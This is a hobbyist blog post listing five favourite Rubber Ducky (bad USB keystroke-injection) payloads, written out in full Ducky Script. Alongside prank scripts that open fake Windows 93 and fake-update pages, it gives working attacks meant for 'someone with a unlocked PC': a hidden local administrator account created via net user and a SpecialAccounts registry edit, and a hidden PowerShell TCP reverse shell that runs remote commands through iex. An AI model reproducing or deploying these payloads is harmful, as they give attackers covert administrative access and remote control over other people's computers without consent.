My 5 favorite things to do with a Rubber Ducky

Smartphone Tech

My 5 favorite things to do with a Rubber Ducky

Some people like to take a bath with their Rubber Ducky. I find that bathing with it tends to fry the board. The Rubber Ducky or bad USB as people in the hacking and pen testing community call it, is used to mimic a USB keyboard and send key strokes to a PC. What is awesome about the Rubber Ducky is that you can pre-program all of the key stroke the device sends to the PC, making this tool a hackers best friend. You can simple walk up to a computer that is unlocked and stick this USB stick into a port and boom it will start sending whatever you tell it to. Lets take a look at some of my favorite payloads.

1. The Windows 93 Prank

This one is fun and simple. Go to the site and press F11 to see what will happen.

DELAY 500
GUI r
DELAY 500
REM takes the users computer to a fake windows93 site
STRING http://www.windows93.net/
ENTER
DELAY 500
REM f11 is triggered so it looks like a real desktop
F11
ENTER

2. Login to my PC

This is on i like to use to same 3 different passwords to help me to login to my PC’s without having to type in passwords just plug in my Rubber Ducky.

REM Type Login
DELAY 1000
STRING password
ENTER
DELAY 100
ENTER
DELAY 1000
STRING different password
ENTER
DELAY 100
ENTER
DELAY 1000
STRING another password
ENTER

The Rubber Ducky is the name given to this bad USB by its creator at https://shop.hak5.org/ The tool is awesome and they have a lot more cool pen testing and hacking tools that they offer along with all of the community forums and pre-made payloads for the Duck. One of the tools you will need to use with the duck is an encoder like the ducktoolkit which allows out to take this code above and put it in the right payload form for the ducky. This encoder is really easy to use and best of all its free.

3. Windows is updating hell

This one kills me as it will never end and the person waiting will be there for days lol.

REM fake update LUL
REM
REM let the ducky HID enumerate
DELAY 3000
GUI r
DELAY 500
STRING iexplore http://fakeupdate.net/win10u/index.html
ENTER
REM is likely that have slow internet connection
DELAY 4000
F11

4. Add Admin Account

Yes that’s right, find someone with a unlocked PC and plug this one in to get a admin account setup with your credentials.

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Net User /ADD
ENTER
STRING Net LocalGroup Administrators /ADD
ENTER
DELAY 500
STRING reg add ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList’ /v /t REG_DWORD /d 0 /f
ENTER

STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-58401.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58401.ps1
ENTER

5. Reverse shell

Reverse shell is simple and powerful. This about it what is you had 4 and 5 together. Now you will have remote access and a admin account on someones PC.

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
ENTER
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
ENTER

STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER

There is so much more you can do with a Rubber Ducky so we haven’t even scratched the surface with this list. If you find this as interesting as i do then go pick one up at Hak5 and start having some fun. If you like tech and learning new things then please check out our Phonlab Smartphone Tech Course today.

Please comment below

RootJunky

 

Leave a Reply